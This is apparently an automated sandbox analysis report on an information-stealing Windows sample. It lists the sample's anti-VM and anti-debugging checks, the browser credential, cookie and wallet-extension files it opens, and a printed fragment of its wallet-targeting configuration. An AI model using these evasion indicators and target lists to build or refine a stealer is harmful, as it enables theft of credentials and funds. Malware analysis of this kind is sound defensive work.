              Source: C:\Users\user\Desktop\file.exe TID: 6648Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5952Thread sleep time: -34017s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5824Thread sleep time: -38019s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5236Thread sleep time: -44022s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3624Thread sleep time: -38019s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2496126625.0000000006029000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2490996919.0000000000380000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2390528382.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2125627594.00000000054CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2470759109.0000000000D63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: file.exe, 00000000.00000003.2390528382.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2470759109.0000000000D63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2125627594.00000000054CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2496126625.0000000006029000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2490996919.0000000000380000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2125627594.00000000054C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: file.exe, 00000000.00000002.2496126625.0000000006029000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: file.exe, 00000000.00000002.2490996919.0000000000380000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DProgram Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.2230821228.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2295967250.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2230565579.0000000000D5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s%\Windows Defender\MsMpeng.exe
              Source: file.exe, 00000000.00000003.2211110090.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2390528382.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 828, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exeString found in binary or memory: llets/Electrum-LTC
              Source: file.exeString found in binary or memory: llets/ElectronCash
              Source: file.exeString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.2125480427.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: file.exe, 00000000.00000003.2086754787.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":["*"],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":["*"],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she.*.sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Epic Privacy Browser\\User Data","z":"EpicPrivacyBrowser"},{"t":1,"p":"%localappdata%\\Vivaldi\\User Data","z":"Vivaldi"},{"t":1,"p":"%localappdata%\\Maxthon\\User Data","z":"Maxthon"},{"t":1,"p":"%localappdata%\\Iridium
              Source: file.exeString found in binary or memory: ExodusWeb3
              Source: file.exeString found in binary or memory: Wallets/Ethereum
              Source: file.exe, 00000000.00000003.2125480427.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.2125445564.0000000000D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
